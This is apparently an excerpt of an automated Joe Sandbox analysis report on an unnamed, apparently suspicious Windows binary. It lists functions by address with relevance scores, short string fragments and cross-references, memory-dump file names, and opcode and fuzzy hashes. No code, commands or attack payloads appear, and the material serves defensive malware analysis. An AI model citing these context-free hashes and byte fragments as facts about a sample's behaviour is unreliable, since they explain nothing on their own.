Instruction ID: 2ba3d001b16e20a6766dbfe18f4ad190a8e0e889b15b9b7f9afb61491fc0023a
Opcode Fuzzy Hash: 3ce2d9f1c5bc2b6d78548ae3f2526d6fd4f0ff79ddfcde1f4cc568e42f585da3
Instruction Fuzzy Hash: F422532190C7E989DB36C67C8C487DDBFA15B26314F0842D9C4E96B3D2C7B90B85CB66

Function 004250D0 Relevance: 50.1, Strings: 39, Instructions: 1329COMMON

Download Yara Rule

Strings

JhB, xrefs: 00425561, 00425595, 00426844, 0042687A
q#s%, xrefs: 00426017
"s u, xrefs: 00425E1A
Z7W9, xrefs: 00425FF6
D>C0, xrefs: 00425142
'w+y, xrefs: 00425E25
35, xrefs: 00426265
=l:n, xrefs: 00425A25
\, xrefs: 004259D8
6h?j, xrefs: 00425A1A
,{+}, xrefs: 004260B1
bc, xrefs: 004260C7
+k<m, xrefs: 00425E5C
I~, xrefs: 00425D02
E"O$, xrefs: 0042512A
/p%r, xrefs: 00425A04
7w.y, xrefs: 004260A6
u&U8, xrefs: 00425132
T.] , xrefs: 00425122
s'k), xrefs: 00426022
56, xrefs: 00425156
>g0i, xrefs: 00425E51
cd, xrefs: 00425A3B
F:]<, xrefs: 0042513A
0s&u, xrefs: 0042609B
U;W=, xrefs: 00426001
T2@4, xrefs: 0042514A
o]p_, xrefs: 00425B21
p$r&, xrefs: 0042598B
1t'v, xrefs: 00425A0F
35, xrefs: 004261E0, 004261A0
l+j-, xrefs: 0042602D
B?y!, xrefs: 0042600C
Fx)z, xrefs: 004259EE
+|,~, xrefs: 004259F9
23, xrefs: 004264D7
1c&e, xrefs: 00425E46
[*I,, xrefs: 0042511A
+{-}, xrefs: 00425E30

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "s u$'w+y$+k<m$+{-}$+|,~$,{+}$/p%r$0s&u$1c&e$1t'v$23$35$35$56$6h?j$7w.y$=l:n$>g0i$B?y!$D>C0$E"O$$F:]<$Fx)z$I~$JhB$T.] $T2@4$U;W=$Z7W9$[*I,$\$bc$cd$l+j-$o]p_$p$r&$q#s%$s'k)$u&U8
API String ID: 0-2307887704
Opcode ID: 17d1a1ea9ed1a32337330ca4cbb0ddce78e7ef8395b36b806993a90f1d2dfecc
Instruction ID: 7ac134510d4c4a064a08f51626c143d79c645c4439f84dddac2ae618a2334218
Opcode Fuzzy Hash: 17d1a1ea9ed1a32337330ca4cbb0ddce78e7ef8395b36b806993a90f1d2dfecc
Instruction Fuzzy Hash: B8B295B560C3918BD334CF24D8417ABBBF2FB81304F85892DE9D99B251D77499068B8B

Function 004253C0 Relevance: 41.2, Strings: 32, Instructions: 1173COMMON

Download Yara Rule

Strings

JhB, xrefs: 00425561, 00425595, 00426844
q#s%, xrefs: 00426017
"s u, xrefs: 00425E1A
Z7W9, xrefs: 00425FF6
'w+y, xrefs: 00425E25
35, xrefs: 00426265
=l:n, xrefs: 00425A25
\, xrefs: 004259D8
6h?j, xrefs: 00425A1A
,{+}, xrefs: 004260B1
bc, xrefs: 004260C7
+k<m, xrefs: 00425E5C
I~, xrefs: 00425D02
/p%r, xrefs: 00425A04
7w.y, xrefs: 004260A6
HI, xrefs: 0042541B
s'k), xrefs: 00426022
>g0i, xrefs: 00425E51
cd, xrefs: 00425A3B
0s&u, xrefs: 0042609B
U;W=, xrefs: 00426001
o]p_, xrefs: 00425B21
p$r&, xrefs: 0042598B
1t'v, xrefs: 00425A0F
35, xrefs: 004261E0, 004261A0
l+j-, xrefs: 0042602D
B?y!, xrefs: 0042600C
Fx)z, xrefs: 004259EE
+|,~, xrefs: 004259F9
23, xrefs: 004264D7
1c&e, xrefs: 00425E46
+{-}, xrefs: 00425E30

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "s u$'w+y$+k<m$+{-}$+|,~$,{+}$/p%r$0s&u$1c&e$1t'v$23$35$35$6h?j$7w.y$=l:n$>g0i$B?y!$Fx)z$HI$I~$JhB$U;W=$Z7W9$\$bc$cd$l+j-$o]p_$p$r&$q#s%$s'k)
API String ID: 0-715116172
Opcode ID: d352bd08e211a1fb933d3d7bb187b7b6a1a062c1520ec0b717a8521f2359a3fe
Instruction ID: 127b11826103c615ee40430b5b6fc65f3147e2cc9f1534f046fdfebc99700db1
Opcode Fuzzy Hash: d352bd08e211a1fb933d3d7bb187b7b6a1a062c1520ec0b717a8521f2359a3fe
Instruction Fuzzy Hash: 60A294B560C3918BD334CF24E8417ABBBF2FB91304F45882DE4D99B251D7749A068B9B

Function 0043594A Relevance: 30.3, Strings: 24, Instructions: 330COMMON

Download Yara Rule

Strings

i, xrefs: 004359D7
d, xrefs: 00435A1D
U, xrefs: 00435967
e, xrefs: 004359C9
>, xrefs: 00435BC4
4, xrefs: 00435AA7
R, xrefs: 00435983
l, xrefs: 004359BB
", xrefs: 00435CFD
w, xrefs: 00435A6F
t, xrefs: 00435A97
l, xrefs: 00435A0F
u, xrefs: 00435A39
V, xrefs: 00435975
w, xrefs: 00435A9F
m, xrefs: 004359E5
r, xrefs: 00435A47
0, xrefs: 00435CDB
{, xrefs: 00435A4F
<, xrefs: 00435BBB
p, xrefs: 00435A5F
X, xrefs: 004359AD
p, xrefs: 00435A67
x, xrefs: 004359F3

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "$0$4$<$>$R$U$V$X$d$e$i$l$l$m$p$p$r$t$u$w$w$x${
API String ID: 0-998723159
Opcode ID: 1267151702fd756eae790674c6046534372c761ad510e8995fb3dbcd84653697
Instruction ID: 0cb130ea1036f74af54040b2137e8d8a935cee2adc7c4595def3cd68d238726d
Opcode Fuzzy Hash: 1267151702fd756eae790674c6046534372c761ad510e8995fb3dbcd84653697
Instruction Fuzzy Hash: C4F1B121D087E98ADB22C67C88043DDBFB15B57324F1843D9D4E9AB3D2C7740A45DB66

Function 00422230 Relevance: 8.0, Strings: 6, Instructions: 466COMMON

Download Yara Rule

Strings

z'B, xrefs: 00422774
jXZ, xrefs: 004222CD
sFI, xrefs: 00422705
!DEF, xrefs: 00422305
,-, xrefs: 004225D8
Z$A&, xrefs: 004222C5

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: !DEF$,-$Z$A&$jXZ$sFI$z'B
API String ID: 0-218680454
Opcode ID: ee8323da335195e2ec7553a5476fc0c1afe3894216dec15ab5bbc220cd1f0a97
Instruction ID: fb0f48b61bf5d52141d30a11fd7957ef21f10efc2c9c0155200098b2902cd3b4
Opcode Fuzzy Hash: ee8323da335195e2ec7553a5476fc0c1afe3894216dec15ab5bbc220cd1f0a97
Instruction Fuzzy Hash: 6BD145716183209BC728DF24C95276BB7F1FF91344F498A5DE8868B3A0E779D900CB96

Function 00418ED1 Relevance: 6.9, Strings: 5, Instructions: 625COMMON

Download Yara Rule

Strings

@uEw, xrefs: 0041928C
Jy_{, xrefs: 00419294
'qDs, xrefs: 00419284
Ea2c, xrefs: 0041946D, 00419516, 0041905D, 004193E0, 00419144, 00419021, 0041941D, 004190AB
Ea2c, xrefs: 00418F1A

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 'qDs$@uEw$Ea2c$Ea2c$Jy_{
API String ID: 0-2958150656
Opcode ID: 42aaac3ccb4499c9c7ac9672a2af6d9550c11047b1d61c2b8f4003236d62043e
Instruction ID: 7be23511d8ec661d06a5e2b4f729eb51638645a3bb4c81107a702123193eff4d
Opcode Fuzzy Hash: 42aaac3ccb4499c9c7ac9672a2af6d9550c11047b1d61c2b8f4003236d62043e
Instruction Fuzzy Hash: B21201769153129BC324CF28C8916ABB7F2FFC5710F19996EE8859B360E7389C41CB46

Function 00433860 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004338AB
GetSystemMetrics.USER32 ref: 004338BA

Strings

, xrefs: 0043398E

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 0145339d8e1297551a972d44f1947888685f1b5aa153286317ee8ed8423a2cd7
Instruction ID: 9347ab673641b0542c76a32de03eb0cf3a32a71adfdf1422f6f49847fc49baaa
Opcode Fuzzy Hash: 0145339d8e1297551a972d44f1947888685f1b5aa153286317ee8ed8423a2cd7
Instruction Fuzzy Hash: F15183B4E142089FCB44EFACD98569EBBF0BF88300F518529E898E7350D774A945CF86

Function 0042A2C0 Relevance: 5.3, Strings: 4, Instructions: 317COMMON

Download Yara Rule

Strings

I!M#, xrefs: 0042A32A
@-./, xrefs: 0042A342
P)G+, xrefs: 0042A33A
%]Y#, xrefs: 0042A5A5

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: %]Y#$@-./$I!M#$P)G+
API String ID: 0-2634571373
Opcode ID: 42bbe22632be0315e52129f2c4335a826d5090d4660edd3964ba4da0ad50b327
Instruction ID: 51cdea4b60f56710e6a86bb19e1ff66e610505c953ea40d9cc1e8744373e5cf5
Opcode Fuzzy Hash: 42bbe22632be0315e52129f2c4335a826d5090d4660edd3964ba4da0ad50b327
Instruction Fuzzy Hash: 7DA13474608316DFE320CF24B88062BBBE5EB86304F55493DE9D19B291D735D80A8B9B

Function 0040F1A2 Relevance: 5.1, Strings: 4, Instructions: 148COMMON

Download Yara Rule

Strings

(}, xrefs: 0040F251
", xrefs: 0040F367
}z, xrefs: 0040F272
D, xrefs: 0040F3EC

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "$(}$D$}z
API String ID: 0-288630403
Opcode ID: 838c80af671b9f3c2f6c74f586491091195101ee1c8ba600b856b697149670be
Instruction ID: e312989b2c4792db848879f9bac54e9e2354a8202f9c92075631cf5adc1f1b71
Opcode Fuzzy Hash: 838c80af671b9f3c2f6c74f586491091195101ee1c8ba600b856b697149670be
Instruction Fuzzy Hash: 535114B05093808AE7348F11C9A575BBBE1FF81708F24891CE6D95B790D7BA9409CF86

Function 004092B0 Relevance: 4.2, Strings: 3, Instructions: 423COMMON

Download Yara Rule

Strings

[z, xrefs: 00409430
jrTW, xrefs: 00409674
,/, xrefs: 00409492

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ,/$[z$jrTW
API String ID: 0-25380742
Opcode ID: aad448e5e141119624ce5ea80ae0f62c11a7ca72f167603081a76399b173a223
Instruction ID: 37d8b99ee0fc071fa72ea5f9e128431a57fb298bf1ebe83ab69a6401654ec06a
Opcode Fuzzy Hash: aad448e5e141119624ce5ea80ae0f62c11a7ca72f167603081a76399b173a223
Instruction Fuzzy Hash: D5C1F57250C3919BC322CF79889079BBFE1AFD7210F48496DE4D45B382D739990AC796

Function 0043E340 Relevance: 4.0, Strings: 3, Instructions: 216COMMON

Download Yara Rule

Strings

rC, xrefs: 0043E85E
bC, xrefs: 0043E412
2C, xrefs: 0043EA20

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 2C$bC$rC
API String ID: 0-501456740
Opcode ID: cdb9a8649a37df1c182bb21217c0e780be0c6e0eec2e67f505f83ea07c441e53
Instruction ID: bdc6b92e627a27bcb7d1270e44e76223523d24ebb0e0ecb33019788e0de75ff5
Opcode Fuzzy Hash: cdb9a8649a37df1c182bb21217c0e780be0c6e0eec2e67f505f83ea07c441e53
Instruction Fuzzy Hash: 4251D23AB54231CFC7488FA8D8D165A77E2FB8A321F2A447DD906977A1DA749C11CB80

Function 0043E3F0 Relevance: 3.9, Strings: 3, Instructions: 178COMMON

Download Yara Rule

Strings

rC, xrefs: 0043E85E
bC, xrefs: 0043E412
2C, xrefs: 0043EA20

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 2C$bC$rC
API String ID: 0-501456740
Opcode ID: 7080bc0ac3e147c9e3a80f61a8ad691461d74ea4b3fa675f3593bf458fc39fe8
Instruction ID: f2eececc4741b3fa768bd15513f9d48caabc0daf360a8009deb7bee4f12945da
Opcode Fuzzy Hash: 7080bc0ac3e147c9e3a80f61a8ad691461d74ea4b3fa675f3593bf458fc39fe8
Instruction Fuzzy Hash: 8D513176E54231CFC7088FA8CC9266A77E2FB9A720F1A447DD946A7790D6785C01C790

Function 007893AC Relevance: 3.7, Strings: 2, Instructions: 1184COMMON

Download Yara Rule

Strings

qb), xrefs: 00789638
h, xrefs: 007897BF

Memory Dump Source

Source File: 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_783000_file.jbxd

Yara matches

Similarity

API ID:
String ID: h$qb)
API String ID: 0-8020182
Opcode ID: 60ee444702f4109b24438a58d2bb9ac7bd5c0692df10bafd67a440d52b8b87cb
Instruction ID: 1628ea492aa70a212521170d355f6b43d17622ddc3ef697e6537e68888dbf378
Opcode Fuzzy Hash: 60ee444702f4109b24438a58d2bb9ac7bd5c0692df10bafd67a440d52b8b87cb
Instruction Fuzzy Hash: 2842E26648E7D14FD703AB7098686A17FB0AF23225B1E41EBC1C4CF4E3E25D595AC722

Function 00404C40 Relevance: 3.3, Strings: 2, Instructions: 805COMMON

Download Yara Rule

Strings

0, xrefs: 00405571
8, xrefs: 00405569

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: f625e4a7261f0f18c15e222e6bb8470ded69b8f6f22db671e404608b4911e8d4
Instruction ID: c3ff3b1eb68a7071d88dd215ac4557eea574da65afadce327f2987d36a3cbf3c
Opcode Fuzzy Hash: f625e4a7261f0f18c15e222e6bb8470ded69b8f6f22db671e404608b4911e8d4
Instruction Fuzzy Hash: 5A7225B16083419FD710CF18C880BABBBE1EF94354F04892EF9999B391D379D958CB96

Function 0077215A Relevance: 3.2, Instructions: 3248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_76f000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86fca38b97cf6b60771da6860ef807ec37ec3e1e8489f31e49b331a5d395a69
Instruction ID: 0d71ce524d2743ea6a3212202cf2d6022903cc2e69c5ae9ebc37cf4fe80802e7
Opcode Fuzzy Hash: b86fca38b97cf6b60771da6860ef807ec37ec3e1e8489f31e49b331a5d395a69
Instruction Fuzzy Hash: 1F92019181E7C12FCB178B709D69651BF706E13214B1E82CFC8D98F8E3E358991AD762

Function 00416866 Relevance: 3.0, Strings: 2, Instructions: 481COMMON

Download Yara Rule

Strings

D, xrefs: 00416C66
\], xrefs: 00416E5B

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: D$\]
API String ID: 0-161661275
Opcode ID: f393bd324d16e84f7dcddd299c04f002466304702a344b181c4b3588a1656cc5
Instruction ID: ca227c4ec1df78f483ae4196cbbf6a5c200726a8c714447d50598be346294755
Opcode Fuzzy Hash: f393bd324d16e84f7dcddd299c04f002466304702a344b181c4b3588a1656cc5
Instruction Fuzzy Hash: 55F17AB0018390CAE3708F24C4617ABBBF1FF92354F159A5DD4D91B391E37A8846CB9A

Function 0040DA91 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

u, xrefs: 0040DCD9
W$Y, xrefs: 0040DDAA

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: W$Y$u
API String ID: 0-2168761075
Opcode ID: bc0553f2ec6d83140f29c4a4c1645253fe7306736b17025086c01e711f044156
Instruction ID: a8178e12f58bc97bca8d0dc7febadd7c5ff2793cc6100f147e671408075a2d1c
Opcode Fuzzy Hash: bc0553f2ec6d83140f29c4a4c1645253fe7306736b17025086c01e711f044156
Instruction Fuzzy Hash: 7171257090C38046D721A7348895BFFBBE5EF9A318F18197DD4C9EB293E778441A831A

Function 0043D111 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

L6E, xrefs: 0043D111
@, xrefs: 0043D174

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: @$L6E
API String ID: 0-1202440179
Opcode ID: d8b0ed3d3ed35ca566e28d0202b4fd0e3a3b5732efa50a356bf122df335a5052
Instruction ID: 4e482137c34d688586a8790d148c1a135da25de1ccbf402732ebb22660f76c81
Opcode Fuzzy Hash: d8b0ed3d3ed35ca566e28d0202b4fd0e3a3b5732efa50a356bf122df335a5052
Instruction Fuzzy Hash: 8B31E372E1011487DB18CF64D8523AFB2B3EBD9304F29926DC402AB294EF394D068B88

Function 00416220 Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

\I, xrefs: 00416293
Cw, xrefs: 0041627D

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: Cw$\I
API String ID: 0-2532810310
Opcode ID: 0327ad6df3cfc3212e912bf6fa6d4556c19b7291280d92ff22280623eeed1bdf
Instruction ID: ad74ee78a5f92b8127c50bcc390207234b4fc517d47b268ffb0e40b26e0b77cb
Opcode Fuzzy Hash: 0327ad6df3cfc3212e912bf6fa6d4556c19b7291280d92ff22280623eeed1bdf
Instruction Fuzzy Hash: E631EFB450A2408BD330AF24C8457ABB3B0EF86360F15462DE8998B3D1E7789840CB9A

Function 00415A62 Relevance: 2.0, Strings: 1, Instructions: 730COMMON

Download Yara Rule

Strings

r[A, xrefs: 00415B61

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: r[A
API String ID: 0-4037054645
Opcode ID: cb7947d40da40d97834472dcf3f5dcc627c72c3b9b42fb9eb3640c563b0a0460
Instruction ID: 02607fbad012d598115ffa089da0578be2a11f59ef4155b1d8870e3ec4b8e9f7
Opcode Fuzzy Hash: cb7947d40da40d97834472dcf3f5dcc627c72c3b9b42fb9eb3640c563b0a0460
Instruction Fuzzy Hash: 72122338608300EBEB149F14E852BBB73A2FB86314F55593DE58257292D734EC52CB8A

Function 0043B370 Relevance: 2.0, Strings: 1, Instructions: 719COMMON

Download Yara Rule

Strings

f, xrefs: 0043B5F1

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: b7bdc246ccb7d462daa229a7e869b2f5c654784963e2617bc7ff646c69b7c8b9
Instruction ID: cc1579294515130ab6a14a6d25e11bdc42e62a6ca6cd769fb05f4ebf758f629f
Opcode Fuzzy Hash: b7bdc246ccb7d462daa229a7e869b2f5c654784963e2617bc7ff646c69b7c8b9
Instruction Fuzzy Hash: E932F471A083418FD714CF29C88072BBBE2FBC9324F159A2EE69597391D778D841CB96

Function 0041EA66 Relevance: 1.7, Strings: 1, Instructions: 469COMMON

Download Yara Rule

Strings

2A, xrefs: 0041EF2C

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 2A
API String ID: 0-225269067
Opcode ID: 9b95ebee791168dd15b0200f1a2cf2fbacfec23ae234377c1ad937f2cd9d1e3f
Instruction ID: 85abb5cd35afa021b706273a3c55283967550840d126f63e6e2e3392557e96a0
Opcode Fuzzy Hash: 9b95ebee791168dd15b0200f1a2cf2fbacfec23ae234377c1ad937f2cd9d1e3f
Instruction Fuzzy Hash: B0C1E0BAE412258BCB24CFA5C8927EFBB72FF95310F184159D8516B394E3399C42C798

Function 0043911E Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

)*, xrefs: 00439439

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: )*
API String ID: 0-3726918850
Opcode ID: fc3ad291faf4bce7b0ab8804e48d0a64550710a3d411c306a19a8c5b5b6595d0
Instruction ID: 7eaddeec2ea1f3303c49058ef5387fd40852bbcee4b02125c76f17607886b80d
Opcode Fuzzy Hash: fc3ad291faf4bce7b0ab8804e48d0a64550710a3d411c306a19a8c5b5b6595d0
Instruction Fuzzy Hash: 65D1EE3A628212CBC714AF68DC4116B73F1FF8A311F0A887DD5848B2A0EB79DD21D755

Function 0043F960 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

,, xrefs: 0043FC0D

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: ,
API String ID: 2994545307-3772416878
Opcode ID: 7875a27bf40f4fc8c2d82e021479082e37a865204141128c1e1d68dfc485cbf8
Instruction ID: 2270cf8c3bf95b6b9a4b7b53c356c1932a1531dc22156f57a77921fb7da3e809
Opcode Fuzzy Hash: 7875a27bf40f4fc8c2d82e021479082e37a865204141128c1e1d68dfc485cbf8
Instruction Fuzzy Hash: 16C18E756083059FC714DF28C89096BB7E1FB89710F15992DE9958B361EB34EC05CB86

Function 00424088 Relevance: 1.6, Strings: 1, Instructions: 379COMMON

Download Yara Rule

Strings

4FB, xrefs: 0042455B

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 4FB
API String ID: 0-3805437025
Opcode ID: 1dbb53b80093d5632196cbd795976bc65ef7f0784fd8723698ae9e5edd3748ba
Instruction ID: 702288ba934b2ab972ed5445351e24d6f7babd7879836e3fd078900fd9156e04
Opcode Fuzzy Hash: 1dbb53b80093d5632196cbd795976bc65ef7f0784fd8723698ae9e5edd3748ba
Instruction Fuzzy Hash: F2C1AB79608301DFD714CF28EC8162AB3E1FB8A314F4A897CE986D7291D739E911CB56

Function 00426359 Relevance: 1.6, Strings: 1, Instructions: 379COMMON

Download Yara Rule

Strings

23, xrefs: 004264D7

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 23
API String ID: 0-326707096
Opcode ID: 580a6dc72aec8c93fd3457cac589536d236eacae8dc85020da763fb99c288834
Instruction ID: d15a7f3d0c545fbc0fa56a034e23d1be3dc09a325538403ca9fbca7615165276
Opcode Fuzzy Hash: 580a6dc72aec8c93fd3457cac589536d236eacae8dc85020da763fb99c288834
Instruction Fuzzy Hash: 5FB107356083628BC714DF29D8401AFB3E2FF95744F9AC82DE8C597214D7389906CB9A

Function 0040824E Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

-, xrefs: 004085B7

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 8e888e3937aaff25ae9a4bc71968b5b37194e995f4b18d90443b1d4237c3d3ef
Instruction ID: f68e524e7254b4660943573ebb3b2c87bf021edc5c4c8ad388b9b0f093c0a0eb
Opcode Fuzzy Hash: 8e888e3937aaff25ae9a4bc71968b5b37194e995f4b18d90443b1d4237c3d3ef
Instruction Fuzzy Hash: 26C1293190C6128BC314CF18C59026BB7E2EFC1314F198A6EE4D56B3D6DB399C468B86

Function 0041DB6A Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

wh, xrefs: 0041DC87

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

